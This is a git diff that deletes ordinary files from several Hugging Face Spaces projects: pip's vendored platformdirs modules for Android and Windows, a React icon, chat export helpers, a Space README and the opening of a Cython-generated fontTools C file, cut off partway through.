- if self.opinion: - path = os.path.join(path, "log")  # noqa: PTH118 - return path - - @property - def user_documents_dir(self) -> str: - """:return: documents directory tied to the user e.g. ``/storage/emulated/0/Documents``""" - return _android_documents_folder() - - @property - def user_downloads_dir(self) -> str: - """:return: downloads directory tied to the user e.g. ``/storage/emulated/0/Downloads``""" - return _android_downloads_folder() - - @property - def user_pictures_dir(self) -> str: - """:return: pictures directory tied to the user e.g. ``/storage/emulated/0/Pictures``""" - return _android_pictures_folder() - - @property - def user_videos_dir(self) -> str: - """:return: videos directory tied to the user e.g. ``/storage/emulated/0/DCIM/Camera``""" - return _android_videos_folder() - - @property - def user_music_dir(self) -> str: - """:return: music directory tied to the user e.g. 
``/storage/emulated/0/Music``""" - return _android_music_folder() - - @property - def user_runtime_dir(self) -> str: - """ - :return: runtime directory tied to the user, same as `user_cache_dir` if not opinionated else ``tmp`` in it, - e.g. ``/data/user///cache//tmp`` - """ - path = self.user_cache_dir - if self.opinion: - path = os.path.join(path, "tmp") # noqa: PTH118 - return path - - -@lru_cache(maxsize=1) -def _android_folder() -> str | None: - """:return: base folder for the Android OS or None if it cannot be found""" - try: - # First try to get path to android app via pyjnius - from jnius import autoclass - - context = autoclass("android.content.Context") - result: str | None = context.getFilesDir().getParentFile().getAbsolutePath() - except Exception: # noqa: BLE001 - # if fails find an android folder looking path on the sys.path - pattern = re.compile(r"/data/(data|user/\d+)/(.+)/files") - for path in sys.path: - if pattern.match(path): - result = path.split("/files")[0] - break - else: - result = None - return result - - -@lru_cache(maxsize=1) -def _android_documents_folder() -> str: - """:return: documents folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - documents_dir: str = context.getExternalFilesDir(environment.DIRECTORY_DOCUMENTS).getAbsolutePath() - except Exception: # noqa: BLE001 - documents_dir = "/storage/emulated/0/Documents" - - return documents_dir - - -@lru_cache(maxsize=1) -def _android_downloads_folder() -> str: - """:return: downloads folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - downloads_dir: str = context.getExternalFilesDir(environment.DIRECTORY_DOWNLOADS).getAbsolutePath() - except Exception: # noqa: BLE001 - downloads_dir = 
"/storage/emulated/0/Downloads" - - return downloads_dir - - -@lru_cache(maxsize=1) -def _android_pictures_folder() -> str: - """:return: pictures folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - pictures_dir: str = context.getExternalFilesDir(environment.DIRECTORY_PICTURES).getAbsolutePath() - except Exception: # noqa: BLE001 - pictures_dir = "/storage/emulated/0/Pictures" - - return pictures_dir - - -@lru_cache(maxsize=1) -def _android_videos_folder() -> str: - """:return: videos folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - videos_dir: str = context.getExternalFilesDir(environment.DIRECTORY_DCIM).getAbsolutePath() - except Exception: # noqa: BLE001 - videos_dir = "/storage/emulated/0/DCIM/Camera" - - return videos_dir - - -@lru_cache(maxsize=1) -def _android_music_folder() -> str: - """:return: music folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - music_dir: str = context.getExternalFilesDir(environment.DIRECTORY_MUSIC).getAbsolutePath() - except Exception: # noqa: BLE001 - music_dir = "/storage/emulated/0/Music" - - return music_dir - - -__all__ = [ - "Android", -] diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/windows.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/windows.py deleted file mode 100644 index b52c9c6ea89fc6859fbf3e489072c1b3b0af77fc..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/windows.py +++ 
/dev/null @@ -1,255 +0,0 @@ -"""Windows.""" -from __future__ import annotations - -import ctypes -import os -import sys -from functools import lru_cache -from typing import TYPE_CHECKING - -from .api import PlatformDirsABC - -if TYPE_CHECKING: - from collections.abc import Callable - - -class Windows(PlatformDirsABC): - """ - `MSDN on where to store app data files - `_. - Makes use of the - `appname `, - `appauthor `, - `version `, - `roaming `, - `opinion `, - `ensure_exists `. - """ - - @property - def user_data_dir(self) -> str: - """ - :return: data directory tied to the user, e.g. - ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appname`` (not roaming) or - ``%USERPROFILE%\\AppData\\Roaming\\$appauthor\\$appname`` (roaming) - """ - const = "CSIDL_APPDATA" if self.roaming else "CSIDL_LOCAL_APPDATA" - path = os.path.normpath(get_win_folder(const)) - return self._append_parts(path) - - def _append_parts(self, path: str, *, opinion_value: str | None = None) -> str: - params = [] - if self.appname: - if self.appauthor is not False: - author = self.appauthor or self.appname - params.append(author) - params.append(self.appname) - if opinion_value is not None and self.opinion: - params.append(opinion_value) - if self.version: - params.append(self.version) - path = os.path.join(path, *params) # noqa: PTH118 - self._optionally_create_directory(path) - return path - - @property - def site_data_dir(self) -> str: - """:return: data directory shared by users, e.g. 
``C:\\ProgramData\\$appauthor\\$appname``""" - path = os.path.normpath(get_win_folder("CSIDL_COMMON_APPDATA")) - return self._append_parts(path) - - @property - def user_config_dir(self) -> str: - """:return: config directory tied to the user, same as `user_data_dir`""" - return self.user_data_dir - - @property - def site_config_dir(self) -> str: - """:return: config directory shared by the users, same as `site_data_dir`""" - return self.site_data_dir - - @property - def user_cache_dir(self) -> str: - """ - :return: cache directory tied to the user (if opinionated with ``Cache`` folder within ``$appname``) e.g. - ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appname\\Cache\\$version`` - """ - path = os.path.normpath(get_win_folder("CSIDL_LOCAL_APPDATA")) - return self._append_parts(path, opinion_value="Cache") - - @property - def site_cache_dir(self) -> str: - """:return: cache directory shared by users, e.g. ``C:\\ProgramData\\$appauthor\\$appname\\Cache\\$version``""" - path = os.path.normpath(get_win_folder("CSIDL_COMMON_APPDATA")) - return self._append_parts(path, opinion_value="Cache") - - @property - def user_state_dir(self) -> str: - """:return: state directory tied to the user, same as `user_data_dir`""" - return self.user_data_dir - - @property - def user_log_dir(self) -> str: - """:return: log directory tied to the user, same as `user_data_dir` if not opinionated else ``Logs`` in it""" - path = self.user_data_dir - if self.opinion: - path = os.path.join(path, "Logs") # noqa: PTH118 - self._optionally_create_directory(path) - return path - - @property - def user_documents_dir(self) -> str: - """:return: documents directory tied to the user e.g. ``%USERPROFILE%\\Documents``""" - return os.path.normpath(get_win_folder("CSIDL_PERSONAL")) - - @property - def user_downloads_dir(self) -> str: - """:return: downloads directory tied to the user e.g. 
``%USERPROFILE%\\Downloads``""" - return os.path.normpath(get_win_folder("CSIDL_DOWNLOADS")) - - @property - def user_pictures_dir(self) -> str: - """:return: pictures directory tied to the user e.g. ``%USERPROFILE%\\Pictures``""" - return os.path.normpath(get_win_folder("CSIDL_MYPICTURES")) - - @property - def user_videos_dir(self) -> str: - """:return: videos directory tied to the user e.g. ``%USERPROFILE%\\Videos``""" - return os.path.normpath(get_win_folder("CSIDL_MYVIDEO")) - - @property - def user_music_dir(self) -> str: - """:return: music directory tied to the user e.g. ``%USERPROFILE%\\Music``""" - return os.path.normpath(get_win_folder("CSIDL_MYMUSIC")) - - @property - def user_runtime_dir(self) -> str: - """ - :return: runtime directory tied to the user, e.g. - ``%USERPROFILE%\\AppData\\Local\\Temp\\$appauthor\\$appname`` - """ - path = os.path.normpath(os.path.join(get_win_folder("CSIDL_LOCAL_APPDATA"), "Temp")) # noqa: PTH118 - return self._append_parts(path) - - -def get_win_folder_from_env_vars(csidl_name: str) -> str: - """Get folder from environment variables.""" - result = get_win_folder_if_csidl_name_not_env_var(csidl_name) - if result is not None: - return result - - env_var_name = { - "CSIDL_APPDATA": "APPDATA", - "CSIDL_COMMON_APPDATA": "ALLUSERSPROFILE", - "CSIDL_LOCAL_APPDATA": "LOCALAPPDATA", - }.get(csidl_name) - if env_var_name is None: - msg = f"Unknown CSIDL name: {csidl_name}" - raise ValueError(msg) - result = os.environ.get(env_var_name) - if result is None: - msg = f"Unset environment variable: {env_var_name}" - raise ValueError(msg) - return result - - -def get_win_folder_if_csidl_name_not_env_var(csidl_name: str) -> str | None: - """Get folder for a CSIDL name that does not exist as an environment variable.""" - if csidl_name == "CSIDL_PERSONAL": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Documents") # noqa: PTH118 - - if csidl_name == "CSIDL_DOWNLOADS": - return 
os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Downloads") # noqa: PTH118 - - if csidl_name == "CSIDL_MYPICTURES": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Pictures") # noqa: PTH118 - - if csidl_name == "CSIDL_MYVIDEO": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Videos") # noqa: PTH118 - - if csidl_name == "CSIDL_MYMUSIC": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Music") # noqa: PTH118 - return None - - -def get_win_folder_from_registry(csidl_name: str) -> str: - """ - Get folder from the registry. - - This is a fallback technique at best. I'm not sure if using the registry for these guarantees us the correct answer - for all CSIDL_* names. - """ - shell_folder_name = { - "CSIDL_APPDATA": "AppData", - "CSIDL_COMMON_APPDATA": "Common AppData", - "CSIDL_LOCAL_APPDATA": "Local AppData", - "CSIDL_PERSONAL": "Personal", - "CSIDL_DOWNLOADS": "{374DE290-123F-4565-9164-39C4925E467B}", - "CSIDL_MYPICTURES": "My Pictures", - "CSIDL_MYVIDEO": "My Video", - "CSIDL_MYMUSIC": "My Music", - }.get(csidl_name) - if shell_folder_name is None: - msg = f"Unknown CSIDL name: {csidl_name}" - raise ValueError(msg) - if sys.platform != "win32": # only needed for mypy type checker to know that this code runs only on Windows - raise NotImplementedError - import winreg - - key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders") - directory, _ = winreg.QueryValueEx(key, shell_folder_name) - return str(directory) - - -def get_win_folder_via_ctypes(csidl_name: str) -> str: - """Get folder with ctypes.""" - # There is no 'CSIDL_DOWNLOADS'. - # Use 'CSIDL_PROFILE' (40) and append the default folder 'Downloads' instead. 
- # https://learn.microsoft.com/en-us/windows/win32/shell/knownfolderid - - csidl_const = { - "CSIDL_APPDATA": 26, - "CSIDL_COMMON_APPDATA": 35, - "CSIDL_LOCAL_APPDATA": 28, - "CSIDL_PERSONAL": 5, - "CSIDL_MYPICTURES": 39, - "CSIDL_MYVIDEO": 14, - "CSIDL_MYMUSIC": 13, - "CSIDL_DOWNLOADS": 40, - }.get(csidl_name) - if csidl_const is None: - msg = f"Unknown CSIDL name: {csidl_name}" - raise ValueError(msg) - - buf = ctypes.create_unicode_buffer(1024) - windll = getattr(ctypes, "windll") # noqa: B009 # using getattr to avoid false positive with mypy type checker - windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf) - - # Downgrade to short path name if it has highbit chars. - if any(ord(c) > 255 for c in buf): # noqa: PLR2004 - buf2 = ctypes.create_unicode_buffer(1024) - if windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024): - buf = buf2 - - if csidl_name == "CSIDL_DOWNLOADS": - return os.path.join(buf.value, "Downloads") # noqa: PTH118 - - return buf.value - - -def _pick_get_win_folder() -> Callable[[str], str]: - if hasattr(ctypes, "windll"): - return get_win_folder_via_ctypes - try: - import winreg # noqa: F401 - except ImportError: - return get_win_folder_from_env_vars - else: - return get_win_folder_from_registry - - -get_win_folder = lru_cache(maxsize=None)(_pick_get_win_folder()) - -__all__ = [ - "Windows", -] diff --git a/spaces/plzdontcry/dakubettergpt/src/assets/icons/ImageIcon.tsx b/spaces/plzdontcry/dakubettergpt/src/assets/icons/ImageIcon.tsx deleted file mode 100644 index d33ac2d58f2a91d1039570b29a75f7e59c816676..0000000000000000000000000000000000000000 --- a/spaces/plzdontcry/dakubettergpt/src/assets/icons/ImageIcon.tsx +++ /dev/null @@ -1,17 +0,0 @@ -import React from 'react'; - -const ImageIcon = (props: React.SVGProps) => { - return ( - - - - ); -}; - -export default ImageIcon; diff --git a/spaces/plzdontcry/dakubettergpt/src/utils/chat.ts b/spaces/plzdontcry/dakubettergpt/src/utils/chat.ts deleted file mode 100644 index 
8c06726435779424eb4d95f74e1b657d5f1b3745..0000000000000000000000000000000000000000 --- a/spaces/plzdontcry/dakubettergpt/src/utils/chat.ts +++ /dev/null @@ -1,43 +0,0 @@ -import html2canvas from 'html2canvas'; -import { ChatInterface } from '@type/chat'; - -// Function to convert HTML to an image using html2canvas -export const htmlToImg = async (html: HTMLDivElement) => { - const needResize = window.innerWidth >= 1024; - const initialWidth = html.style.width; - if (needResize) { - html.style.width = '1023px'; - } - const canvas = await html2canvas(html); - if (needResize) html.style.width = initialWidth; - const dataURL = canvas.toDataURL('image/png'); - return dataURL; -}; - -// Function to download the image as a file -export const downloadImg = (imgData: string, fileName: string) => { - const link = document.createElement('a'); - link.href = imgData; - link.download = fileName; - link.click(); - link.remove(); -}; - -// Function to convert a chat object to markdown format -export const chatToMarkdown = (chat: ChatInterface) => { - let markdown = `# ${chat.title}\n\n`; - chat.messages.forEach((message) => { - markdown += `### **${message.role}**:\n\n${message.content}\n\n---\n\n`; - }); - return markdown; -}; - -// Function to download the markdown content as a file -export const downloadMarkdown = (markdown: string, fileName: string) => { - const link = document.createElement('a'); - const markdownFile = new Blob([markdown], { type: 'text/markdown' }); - link.href = URL.createObjectURL(markdownFile); - link.download = fileName; - link.click(); - link.remove(); -}; diff --git a/spaces/pngwn/music-visualizer/README.md b/spaces/pngwn/music-visualizer/README.md deleted file mode 100644 index 34e4ade059acee4bb6e441e3baad6829310f70d8..0000000000000000000000000000000000000000 --- a/spaces/pngwn/music-visualizer/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Music Visualizer -emoji: 🐨 -colorFrom: gray -colorTo: indigo -sdk: gradio -sdk_version: 3.16.2 -app_file: 
app.py -pinned: false -duplicated_from: nateraw/music-visualizer ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/misc/bezierTools.c b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/misc/bezierTools.c deleted file mode 100644 index 9e5d3d79a4f0656e624f40c6f07908d5c08d933b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/misc/bezierTools.c +++ /dev/null @@ -1,40443 +0,0 @@ -/* Generated by Cython 3.0.3 */ - -/* BEGIN: Cython Metadata -{ - "distutils": { - "name": "fontTools.misc.bezierTools", - "sources": [ - "Lib/fontTools/misc/bezierTools.py" - ] - }, - "module_name": "fontTools.misc.bezierTools" -} -END: Cython Metadata */ - -#ifndef PY_SSIZE_T_CLEAN -#define PY_SSIZE_T_CLEAN -#endif /* PY_SSIZE_T_CLEAN */ -#if defined(CYTHON_LIMITED_API) && 0 - #ifndef Py_LIMITED_API - #if CYTHON_LIMITED_API+0 > 0x03030000 - #define Py_LIMITED_API CYTHON_LIMITED_API - #else - #define Py_LIMITED_API 0x03030000 - #endif - #endif -#endif - -#include "Python.h" -#ifndef Py_PYTHON_H - #error Python headers needed to compile C extensions, please install development version of Python. -#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) - #error Cython requires Python 2.7+ or Python 3.3+. -#else -#if CYTHON_LIMITED_API -#define __PYX_EXTRA_ABI_MODULE_NAME "limited" -#else -#define __PYX_EXTRA_ABI_MODULE_NAME "" -#endif -#define CYTHON_ABI "3_0_3" __PYX_EXTRA_ABI_MODULE_NAME -#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI -#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." 
-#define CYTHON_HEX_VERSION 0x030003F0 -#define CYTHON_FUTURE_DIVISION 1 -#include -#ifndef offsetof - #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) -#endif -#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) - #ifndef __stdcall - #define __stdcall - #endif - #ifndef __cdecl - #define __cdecl - #endif - #ifndef __fastcall - #define __fastcall - #endif -#endif -#ifndef DL_IMPORT - #define DL_IMPORT(t) t -#endif -#ifndef DL_EXPORT - #define DL_EXPORT(t) t -#endif -#define __PYX_COMMA , -#ifndef HAVE_LONG_LONG - #define HAVE_LONG_LONG -#endif -#ifndef PY_LONG_LONG - #define PY_LONG_LONG LONG_LONG -#endif -#ifndef Py_HUGE_VAL - #define Py_HUGE_VAL HUGE_VAL -#endif -#define __PYX_LIMITED_VERSION_HEX PY_VERSION_HEX -#if defined(GRAALVM_PYTHON) - /* For very preliminary testing purposes. Most variables are set the same as PyPy. - The existence of this section does not imply that anything works or is even tested */ - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 1 - #define CYTHON_COMPILING_IN_NOGIL 0 - #undef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 0 - #undef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 0 - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #if PY_VERSION_HEX < 0x03050000 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #elif !defined(CYTHON_USE_ASYNC_SLOTS) - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #undef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 0 - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #undef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 1 - #undef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 0 - 
#undef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 0 - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 0 - #undef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) - #endif - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #undef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 0 - #undef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 0 - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 - #endif -#elif defined(PYPY_VERSION) - #define CYTHON_COMPILING_IN_PYPY 1 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 0 - #undef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 0 - #ifndef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 0 - #endif - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #if PY_VERSION_HEX < 0x03050000 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #elif !defined(CYTHON_USE_ASYNC_SLOTS) - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #undef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 0 - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #undef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 1 - #undef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 0 - #undef CYTHON_UNPACK_METHODS - #define 
CYTHON_UNPACK_METHODS 0 - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 0 - #undef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) - #endif - #if PY_VERSION_HEX < 0x03090000 - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 0 - #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #endif - #undef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 0 - #undef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 - #endif -#elif defined(CYTHON_LIMITED_API) - #ifdef Py_LIMITED_API - #undef __PYX_LIMITED_VERSION_HEX - #define __PYX_LIMITED_VERSION_HEX Py_LIMITED_API - #endif - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 1 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 0 - #undef CYTHON_CLINE_IN_TRACEBACK - #define CYTHON_CLINE_IN_TRACEBACK 0 - #undef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 0 - #undef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 1 - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #undef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 0 - #ifndef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #endif - #undef CYTHON_USE_PYLONG_INTERNALS - 
#define CYTHON_USE_PYLONG_INTERNALS 0 - #ifndef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 0 - #endif - #undef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 0 - #undef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 0 - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 0 - #undef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS 1 - #endif - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 0 - #undef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 1 - #ifndef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 0 - #endif - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 - #endif -#elif defined(PY_NOGIL) - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 1 - #ifndef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 1 - #endif - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #ifndef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #ifndef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 1 - #endif - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #ifndef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 0 - #endif - #ifndef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 1 - #endif - #ifndef 
CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 1 - #endif - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #endif - #ifndef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 1 - #endif - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 -#else - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 1 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 0 - #ifndef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 1 - #endif - #ifndef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 0 - #endif - #ifndef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 1 - #endif - #if PY_MAJOR_VERSION < 3 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #elif !defined(CYTHON_USE_ASYNC_SLOTS) - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #ifndef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 1 - #endif - #ifndef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 1 - #endif - #ifndef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 1 - #endif - #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #elif !defined(CYTHON_USE_UNICODE_WRITER) - #define CYTHON_USE_UNICODE_WRITER 1 - #endif - #ifndef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 0 - #endif - #ifndef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 1 - #endif - #ifndef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 1 - #endif - #ifndef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 1 - #endif - #ifndef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 
